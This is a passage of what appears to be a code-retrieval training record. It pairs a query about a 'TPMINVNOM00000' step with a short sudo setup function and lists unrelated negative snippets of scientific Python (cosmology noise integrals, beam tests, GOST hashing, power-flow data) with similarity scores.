1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 0, 0, 1, 1, 1, 1],\n [1, 1, 1, 1, 1, 1, 1],\n [1, 0, 1, 1, 1, 1, 1],\n [1, 1, 0, 1, 1, 1, 1],\n ])\n cm = np.array([\n [0, 1, 1, 0, 1, 0, 0],\n [1, 0, 1, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0],\n [0, 1, 0, 1, 1, 0, 0],\n [0, 0, 0, 1, 1, 0, 0],\n [0, 0, 0, 0, 0, 1, 1],\n [0, 0, 0, 0, 0, 1, 1],\n ])\n # fmt: on\n return Network(tpm, cm=cm, node_labels=LABELS[:tpm.shape[1]])", "def test_uneven_sw():\n B = 100\n t = 1\n H = 30\n E = 20000\n sections = ((2 * B, t, 0, E), (B, t, H - t, E))\n EI, top, bot = bm.EI(sections, E)\n assert 1.95 < abs(bot) / top < 1.96", "def skip_test(n):\n return k > 0 and magic * n * k**0.5 >= t4_ref", "def V2E(V):\n# for v in m/s returns energy in meV\n return 5.227e-6*V*V" ]
[ "0.6024059", "0.58742326", "0.5747745", "0.57027227", "0.5643047", "0.5618062", "0.5584847", "0.5547953", "0.5515293", "0.54348683", "0.5426006", "0.5425438", "0.5389946", "0.53414834", "0.532526", "0.5292617", "0.52875394", "0.5270108", "0.52518106", "0.5248011", "0.52446", "0.52234286", "0.52206236", "0.5220036", "0.52104884", "0.52062696", "0.51975626", "0.5190072", "0.5188982", "0.5188493", "0.5188461", "0.5181919", "0.51750976", "0.5166205", "0.51637584", "0.51606363", "0.5152328", "0.51499075", "0.5140844", "0.5118976", "0.51187587", "0.5113119", "0.5108601", "0.5106117", "0.51013035", "0.5100481", "0.5091519", "0.50855076", "0.50759745", "0.50751156", "0.5073112", "0.50707734", "0.50700915", "0.5064913", "0.5064796", "0.50634605", "0.50616086", "0.5060999", "0.5060169", "0.50599927", "0.50564355", "0.50556827", "0.50508636", "0.5049896", "0.5049714", "0.50401515", "0.5037747", "0.5034233", "0.5031286", "0.5028459", "0.502825", "0.5028197", "0.5027813", "0.50243986", "0.5018472", "0.5017338", "0.50172013", "0.50169224", "0.5012277", "0.501089", "0.5004234", "0.4999304", "0.4998335", "0.49902856", "0.49899575", "0.49880874", "0.4987551", "0.49843842", "0.4982336", "0.49781463", "0.4976788", "0.49765167", "0.49759012", "0.4972044", "0.49711084", "0.49655244", "0.49615902", "0.4961197", "0.49608052", "0.49594963", "0.4934871" ]
0.0
-1
Implementation of TPMINVNOM00000 Step 1.4
def setup(): sudo("minv_setup.sh")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getTru(n,int_method,func) :\n m = np.asarray([0.5,1,1.5,2,2.5,3,3.5,4,4.5,5,6,7,8,9,10])\n bes = np.asarray([-0.5,0,0.43675,0.47773,0.49231,0.49316,0.49280,0.50325,\n 0.51140,0.52169,0.55823,0.58086,0.60463,0.61483,0.66995])\n p = np.asarray([1,0,0.61007,0.77491,0.84071,0.87689,0.89914,0.91365,\n 0.92449,0.93279,0.94451,0.95289,0.95904,0.96385,\n 0.96731])\n h1 = np.asarray([0,0,-0.07257,-0.04963,-0.03313,-0.02282,-0.01648,\n -0.01248,-0.00970,-0.00773,-0.00522,-0.00369,-0.00272,\n -0.00206,-0.00164])\n h2 = np.asarray([0,0,-0.20048,-0.15556,-0.12070,-0.09611,-0.07919,\n -0.06747,-0.05829,-0.05106,-0.04060,-0.03311,-0.02768,\n -0.02353,-0.02053])\n h3 = np.asarray([0,0,0.01647,0.08284,0.14390,0.19680,0.24168,0.27969,\n 0.31280,0.34181,0.39002,0.42942,0.46208,0.48997,0.51325])\n \n if (func == True) :\n int_bes = splev(n,splrep(m, bes))\n int_p = splev(n,splrep(m, p))\n int_h1 = splev(n,splrep(m, h1))\n int_h2 = splev(n,splrep(m, h2))\n int_h3 = splev(n,splrep(m, h3))\n else :\n int_bes = griddata(m, bes, n, method=int_method)\n int_p = griddata(m, p, n, method=int_method)\n int_h1 = griddata(m, h1, n, method=int_method)\n int_h2 = griddata(m, h2, n, method=int_method)\n int_h3 = griddata(m, h3, n, method=int_method)\n \n return np.asarray([int_bes,int_p,int_h1,int_h2,int_h3])", "def TR_algo3(h, vd=2):\n ve = 0\n vd = 2\n p = [0]*N\n for i in range(M-1, -1, -1):\n w = [bit_component(h, i*N+ii) for ii in range(N)]\n #print(i, w)\n w = sum( [wx*2**j for j, wx in enumerate(w)] )\n #print(i, w, gc(w))\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(N):\n p[j] += bit_component(l, j) << i\n ve = ve ^ rotate_left(e(w), vd+1)\n vd = (vd + d(w) + 1) % N\n return p", "def tpm3_1_8_end_genomic():\n return \"TPM3\", \"NC_000001.11\", 154170399, 154170469, -1", "def prove_NI() -> Proof:\n # Optional Task 6.7e", "def ftlan_E1c(hop, v0, T, m=50, Min_b=10e-10, Min_m=5, kB=1, norm = np.linalg.norm):\n# def Tri_diag(a1, b1):\n# mat = np.diag(b1, -1) + np.diag(a1, 0) + np.diag(b1, 1)\n# e, w = np.linalg.eigh(mat)\n# return e, w\n\n beta = 1./(T * kB)\n E = 0.\n a, b = [], []\n v0 = v0/norm(v0)\n Hv = hop(v0)\n a.append(v0.dot(Hv))\n v1 = Hv - a[0] * v0\n b.append(norm(v1))\n if b[0] < Min_b:\n return 0\n\n v1 = v1/b[0]\n Hv = hop(v1)\n a.append(v1.dot(Hv))\n\n for i in range(1, m - 1):\n v2 = Hv - b[i - 1] * v0 - a[i] * v1\n b.append(norm(v2))\n if abs(b[i]) < Min_b:\n b.pop()\n break\n\n v2 = v2/b[i]\n Hv = hop(v2)\n a.append(v2.dot(Hv))\n v0 = v1.copy()\n v1 = v2.copy()\n \n a = np.asarray(a)\n b = np.asarray(b)\n\n eps, phi = Tri_diag(a, b)\n l = len(eps)\n# Eo = eps[0]\n# eps = eps-Eo\n exp_eps = np.exp(-beta * eps)\n E = np.sum(exp_eps * eps * phi[0, :]**2.)\n Z = np.sum(exp_eps * phi[0, :]**2.)\n# for i in range(len(eps)):\n# E += exp_eps[i] * eps[i] * phi[0, i]**2\n\n# E = E + Eo\n# de = eps[:, np.newaxis] - eps\n# for i in range(l):\n# E += eps[i] * phi[0, i]**2./np.sum(np.exp(-beta*de[:l, i])*(phi[0, :l]**2.))\n return E, Z", "def cond_depend_tpm():\n # fmt: off\n tpm = np.array([\n [1.0, 0.0, 0.0, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.5, 0.5, 0.0],\n [0.0, 0.0, 0.0, 1.0],\n ])\n # fmt: on\n return tpm", "def prove_NN() -> Proof:\n # Optional Task 6.7c", "def tpm3_1_8_start_genomic():\n return \"TPM3\", \"NC_000001.11\", 154191901, 154192135, -1", "def stepFunction(Hin, m):\n if makeReport:\n reporter.addHeader2(\"stepFunction(%s,%s)\"%(hex(Hin), hex(m)))\n # step1. generating keys\n C2 = 0\n C3 = 0xff00ffff000000ffff0000ff00ffff0000ff00ff00ff00ffff00ff00ff00ff00\n C4 = 0\n U = Hin\n V = m\n W = U ^ V\n K1 = transformP(W)\n\n U = transformA(U)^C2\n V = transformA(transformA(V))\n W = U ^ V\n K2 = transformP(W)\n\n U = transformA(U)^C3\n V = transformA(transformA(V))\n W = U ^ V\n K3 = transformP(W)\n\n U = transformA(U)^C4\n V = transformA(transformA(V))\n W = U ^ V\n K4 = transformP(W)\n\n if makeReport:\n reporter.addBold(\"Generated keys:\")\n reporter.addList([hex(K1), hex(K2), hex(K3), hex(K4)])\n\n # step2. crypting tranformation\n Hin_cut = Hin # we need Hin for the next step, but this step cuts Hin\n h1 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h2 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h3 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n h4 = cryptBlocks.getRight(Hin_cut, 64, True)\n Hin_cut = cryptBlocks.cutRight(Hin_cut, 64, True)\n s1 = gost28147.cryptBlock(h1, K1)\n s2 = gost28147.cryptBlock(h2, K2)\n s3 = gost28147.cryptBlock(h3, K3)\n s4 = gost28147.cryptBlock(h4, K4)\n S = s4\n S = cryptBlocks.concat(S, s3, 64)\n S = cryptBlocks.concat(S, s2, 64)\n S = cryptBlocks.concat(S, s1, 64)\n if makeReport:\n reporter.addBold(\"Crypting transformation:\")\n reporter.addList([\n \"gost28147(%s,%s)=%s\"%(hex(h1),hex(K1),hex(s1)),\n \"gost28147(%s,%s)=%s\"%(hex(h2),hex(K2),hex(s2)),\n \"gost28147(%s,%s)=%s\"%(hex(h3),hex(K3),hex(s3)),\n \"gost28147(%s,%s)=%s\"%(hex(h4),hex(K4),hex(s4)),\n ])\n reporter.addBold(\"S=\"+hex(S))\n # Step 3. Shuffle transforming.\n Hout = transformPsi(S)\n for i in range(12):\n Hout = transformPsi(Hout)\n Hout = transformPsi(Hout ^ m)^Hin\n for i in range(61):\n Hout = transformPsi(Hout)\n return Hout", "def system(p):\r\n\r\n C1, C2, C3, C4, C5, C6, C7, C8, \\\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22, \\\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34,\\\r\n C35, C36, C37, C38, C39, C40, C41, C42, C43, \\\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56 = p\r\n\r\n C = [C1, C2, C3, C4, C5, C6, C7, C8,\r\n C9,C10,C11,C12,C13,C14,C15,C16,C17,C18,C19,C20,C21,C22,\r\n C23, C24, C25, C26, C27, C28, C29, C30, C31, C32, C33, C34, C35, C36, C37,\r\n C38, C39, C40, C41, C42, C43,\r\n C44, C45, C46, C47, C48, C49, C50, C51, C52, C53, C54, C55, C56]\r\n\r\n eqs = [C[i] * (Kd[i] + Rtot - sum(C)) + Etot[i] * (sum(C) - Rtot) for i in range(n)]\r\n\r\n return eqs", "def test_get_nveto_pmts(self):\n pass", "def calcualte_inte_vn(pT_low, pT_high, data):\n npT = 50\n pT_inte_array = linspace(pT_low, pT_high, npT)\n dpT = pT_inte_array[1] - pT_inte_array[0]\n dN_event = data[:, 2]\n pT_event = data[:, 0]\n dN_interp = exp(interp(pT_inte_array, pT_event, log(dN_event+1e-30)))\n N_event = data[:, -1]\n N_interp = exp(interp(pT_inte_array, pT_event, log(N_event+1e-30)))\n N = sum(N_interp)*dpT/0.1\n temp_vn_array = [N,]\n for iorder in range(1, n_order):\n vn_real_event = data[:, 4*iorder]\n vn_imag_event = data[:, 4*iorder+2]\n vn_real_interp = interp(pT_inte_array, pT_event, vn_real_event)\n vn_imag_interp = interp(pT_inte_array, pT_event, vn_imag_event)\n vn_real_inte = (\n sum(vn_real_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_imag_inte = (\n sum(vn_imag_interp*dN_interp*pT_inte_array)\n /sum(dN_interp*pT_inte_array))\n vn_inte = vn_real_inte + 1j*vn_imag_inte\n temp_vn_array.append(vn_inte)\n return(temp_vn_array)", "def prove_CM() -> Proof:\n # Optional Task 6.7f", "def test_sw2():\n B1 = 100\n B2 = 200\n h = 18\n t = 1\n H = h + 2 * t\n E1 = 20000\n E2 = 10000\n sections = ((B1, t, 0, E1), (B2, t, h + t, E2))\n EI, top, bot = bm.EI(sections, E1)\n EIc = E1 * B1 * (H ** 3 - h ** 3) / 12\n assert 0.99 < EI / EIc < 1.01", "def gen_ep_data(self,ntrials,trlen):\n self.resort_emat()\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([x_encoding_input,x_test_input],1)\n # print('X',x_input)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n return i_input,s_input,yseq", "def gen_ep_data(self,ntrials,trlen):\n ## instruction\n # for each trial, generate random instruction encoding sequence\n i_encoding_input = np.array([\n np.random.permutation(np.arange(1,self.nmaps+1)) \n for i in range(ntrials)\n ])\n i_test_input = np.zeros([ntrials,trlen])\n i_input = np.concatenate([\n i_encoding_input,i_test_input],\n 1).astype(int).reshape(-1) # (ntrials,trlen+)\n ## stimulus\n x_encoding_input = i_encoding_input\n x_test_input = np.random.randint(1,self.nmaps+1,[ntrials,trlen])\n x_input = np.concatenate([i_encoding_input,x_test_input],1)\n ''' \n embed x_input: \n [ntrials,nmaps+trlen] -> s_input [ntrials*(nmaps+trlen),edim]\n explicit loop required for flatten and embedd x_input\n because if switchmaps=1, matrix is resorted between trials\n and therefore same stimulus token integers correspond to\n different stimulus embeddings on different trials\n '''\n s_input = -np.ones([ntrials,(self.nmaps+trlen),self.stimdim])\n for trialn,x_input_trial in enumerate(x_input): \n if self.switchmaps: self.resort_emat()\n s_input[trialn] = self.emat[x_input_trial]\n \n # format output\n i_input = tr.unsqueeze(tr.LongTensor(i_input),1)\n s_input = tr.unsqueeze(tr.Tensor(np.concatenate(s_input)),1)\n yseq = tr.unsqueeze(tr.LongTensor(x_input.reshape(-1)),1)\n if return_trial_flag:\n tr_flag = np.concatenate([i*np.ones(self.nmaps+trlen) for i in range(ntrials)])\n tr_flag = tr.unsqueeze(tr.LongTensor(tr_flag),1)\n return tr_flag,i_input,s_input,yseq,\n else:\n return i_input,s_input,yseq", "def test_post_nveto_pmts(self):\n pass", "def ER_Theory(N,Kappa) :\n\tMu2 = Kappa - ( 2*Kappa*(1.0 - (Kappa/N))*math.log(N) )**0.5 + (( (Kappa*(1.0 - (Kappa/N)))/math.log(N) )**0.5)*( math.log( (2*math.pi*math.log((N**2)/(2*math.pi))) ) - 0.5772)\n\treturn Mu2", "def N_TB_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalEB(l2)\n result *= self.F_TB(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TB_EE.__func__, \"integ\"):\n self.N_TB_EE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TB_EE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TB_EE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EE(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = self.F_EE(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result += self.F_EE(l2, l1, -phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_TE.__func__, \"integ\"):\n self.N_TT_TE.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_TE.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_TE.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def N_TT_EB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_EB(l1, l2, phi)*self.CMB.ftotalTE(l1)*self.CMB.ftotalTB(l2)\n result += 0. #self.F_EB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TT(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TT_EB.__func__, \"integ\"):\n self.N_TT_EB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TT_EB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TT_EB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def vinet(p, v):\n x = ( v / p[3] ) ** ( 1.0 / 3 )\n xi = 3.0 / 2 * ( p[2] - 1 )\n return p[0] + 9 * p[1] * p[3] / ( xi**2 ) * ( 1 + ( xi * ( 1 - x ) - 1 ) * np.exp( xi * ( 1 - x ) ) )", "def prove_N() -> Proof:\n # Optional Task 6.8", "def N_TE_TB(self, L):\n if L>2.*min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n # integrand\n def integrand(x):\n theta = x[1]\n l1 = np.exp(x[0])\n l2 = self.l2(L, l1, theta)\n if l2<self.CMB.lMin or l2>min(self.CMB.lMaxT, self.CMB.lMaxP):\n return 0.\n phi = self.phi(L, l1, theta)\n result = 0. #self.F_TB(l1, l2, phi)*self.CMB.ftotalTT(l1)*self.CMB.ftotalEB(l2)\n result += 0. #self.F_TB(l2, l1, -phi)*self.CMB.ftotalTB(l1)*self.CMB.ftotalTE(l2)\n result *= self.F_TE(l1, l2, phi)\n result *= l1**2\n result /= (2.*np.pi)**2\n result *= 2.\n return result\n \n # if first time, initialize integrator\n if not hasattr(self.N_TE_TB.__func__, \"integ\"):\n self.N_TE_TB.__func__.integ = vegas.Integrator([[np.log(self.CMB.lMin), np.log(min(self.CMB.lMaxT, self.CMB.lMaxP))], [0., np.pi]])\n self.N_TE_TB.integ(integrand, nitn=8, neval=1000)\n result = self.N_TE_TB.integ(integrand, nitn=1, neval=5000)\n return result.mean", "def simulating_verlet(n,N,D,t,Rv,sigma,epsilon,dt,m,T,dim,kb,V,steps_r):\n Ekinv = np.zeros((n,1))\n Epotv = np.zeros((n,1))\n Ev = np.zeros((n,1))\n Gpc = np.zeros((steps_r,n))\n for k in range(len(t)):\n F = particle_forceV(Rv[-1], N, sigma, epsilon, D)\n Rv.append(particle_positionV(copy.deepcopy(Rv[-1]), V, dt, F, D)) \n V = particle_velocityV(V, F, dt, Rv, sigma, epsilon, D, N)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n \n #Calibration\n if (int(k%(10)) == int(0) & int(k)<int(len(t)/2)):\n V = calibration(N, kb,T,Ekinv[k],V)\n Ekinv[k] = np.sum(1/(2*m)*(V**2))\n if int(k)> int(len(t)-50):\n Gpc[:,k], dist, dr = pair_correlation(N,Rv[-1],D,steps_r)\n Uv = particle_LJV(Rv[-1], N, D) \n Epotv[k] = abs(Uv)/2 \n Ev[k] = Ekinv[k]+Epotv[k]\n return Rv, Ekinv, Epotv, Ev, Gpc", "def cal_et(self):\r\n\r\n for ind in range(2**(4*self.k)):\r\n i=0\r\n num = int(bin(ind)[2:])\r\n aux = listarNum(num)\r\n list_num=np.array([])\r\n while i < 4*self.k:\r\n if len(aux) < 4*self.k-i:\r\n list_num=np.append(list_num, [0.])\r\n elif len(aux)==4*self.k-i:\r\n list_num=np.append(list_num, aux)\r\n i=i+1\r\n \"\"\"\r\n reversed_list_num = list_num[::-1]\r\n self.et[ind]=reversed_list_num\r\n \"\"\"\r\n self.et[ind]=list_num", "def TR_algo8(self, h):\n ve = 0\n vd = self._vd\n k = 0\n p = [0,]*self._N\n m = max(self._compact_M)\n vM = sum(self._compact_M)\n for i in range(m-1, -1, -1):\n mu = self.extract_mask(i)\n mu_norm = sum([bit_component(mu, j) for j in range(self._N)])\n mu = rotate_right(mu, vd+1)\n pi = rotate_right(ve, vd+1) & (~mu & 2**self._N-1)\n r = [bit_component(h, vM - k - (j+1)) for j in range(mu_norm)][::-1]\n r = sum( [rx*2**j for j, rx in enumerate(r)] )\n k = k + mu_norm\n w = gcr_inv(r, mu, pi)\n l = gc(w)\n l = T_inv(ve, vd, l)\n for j in range(self._N):\n p[j] |= bit_component(l, j) << i\n ve = ve ^ (rotate_left(e(w), vd+1))\n vd = (vd + d(w) + 1) % self._N\n return p", "def compute_thermo(E,dos,TT):\n if (len(dos)<3):\n print (\"Not enough points in the phonon DOS!\")\n return None\n \n ZPE = 0.5*dos_integral(E,dos,1)\n modes = dos_integral(E,dos)\n \n EvibT = np.zeros(len(TT))\n SvibT = np.zeros(len(TT))\n CvibT = np.zeros(len(TT))\n FvibT = np.zeros(len(TT))\n for i in range(0,len(TT)):\n h = 0.5*(E[2]-E[0])\n arg = K_BOLTZMANN_RY*TT[i]\n arg2 = 2.0 * arg\n Evib = 0.0\n Svib = 0.0\n Cvib = 0.0\n for j in range(0,len(dos)-3,3):\n\n Evib += 3.0*E[j]/tanh(E[j]/(arg2))*dos[j]+\\\n 3.0*E[j+1]/tanh(E[j+1]/(arg2))*dos[j+1]+\\\n 2.0*E[j+2]/tanh(E[j+2]/(arg2))*dos[j+2]\n \n Svib += 3.0*(E[j]/arg2/tanh(E[j]/arg2)-log(2.0*sinh(E[j]/arg2)))*dos[j]+\\\n 3.0*(E[j+1]/arg2/tanh(E[j+1]/arg2)-log(2.0*sinh(E[j+1]/arg2)))*dos[j+1]+\\\n 2.0*(E[j+2]/arg2/tanh(E[j+2]/arg2)-log(2.0*sinh(E[j+2]/arg2)))*dos[j+2]\n\n try: # avoid overflow error for arg very small\n Cvib += 3.0*pow(E[j]/arg,2)/( 4.0*pow(sinh(E[j]/(arg2)),2) )*dos[j]+\\\n 3.0*pow(E[j+1]/arg,2)/( 4.0*pow(sinh(E[j+1]/(arg2)),2) )*dos[j+1]+\\\n 2.0*pow(E[j+2]/arg,2)/( 4.0*pow(sinh(E[j+2]/(arg2)),2) )*dos[j+2]\n except:\n Cvib += 0.0\n\n EvibT[i] = h*0.5*Evib*3.0/8.0 # h is the integration step, 0.5 comes from the equation for E,\n # the factor 3.0/8.0 comes from the Simpson 3/8 rule\n SvibT[i] = h*K_BOLTZMANN_RY*Svib*3.0/8.0\n CvibT[i] = h*K_BOLTZMANN_RY*Cvib*3.0/8.0\n FvibT = EvibT - SvibT * TT\n\n print ()\n return TT, EvibT, SvibT, CvibT, FvibT, ZPE, modes", "def case():\r\n #ppc = {\"version\": '2'}\r\n ppc = {}\r\n ##----- Power Flow Data -----##\r\n ## system MVA base\r\n ppc[\"baseMVA\"] = 100.0\r\n\r\n ## bus data\r\n # bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin\r\n ppc[\"bus\"] = array([\r\n [1, 3, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [2, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [3, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [4, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [5, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [6, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [7, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [8, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [9, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [10, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [11, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [12, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [13, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [14, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [15, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0],\r\n [16, 1, 0, 0, 0, 0, 1, 1, 0, 0.4, 1, 1.1, 0.9, 0,0, 0, 0]\r\n ])\r\n\r\n ## generator data\r\n # bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,\r\n # Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf\r\n ppc[\"gen\"] = array([\r\n [1,\t0,\t0,\t10,\t-10,\t1.0224,\t100,\t1,\t10,\t-10,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0,\t0, 0, 0,0, 0, 0],\r\n [3 ,0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [5 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [10 , 0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [13 ,0, 0, 10e-3, -10e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0],\r\n [15 , 0, 0, 50e-3, -50e-3, 1, 100, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,0, 0, 0]\r\n ])\r\n load_b = array([2, 4, 9, 12, 14])\r\n ppc[\"bus\"][load_b, 2] = multiply(array([-2.1125, -0.2231, -0.1664, -0.0719, -1.4633]).T, 0.03)\r\n ppc[\"bus\"][load_b, 3] = multiply(array([1.6492, 0.4054, 0.8599, 0.8845, 0.6778]).T, 0.03)\r\n ## branch data\r\n # fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax\r\n ppc[\"branch\"] = array([\r\n [1, 2, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 8, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [1, 15, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 3, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 6, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [2, 7, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [3, 4, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [4, 5, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 9, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 12, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [8, 13, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n [9, 10, 0.0, 0.0, 0.0, 250, 250, 250, 0, 0, 1, -360, 360, 0,0, 0, 0, 0,0, 0, 0],\r\n 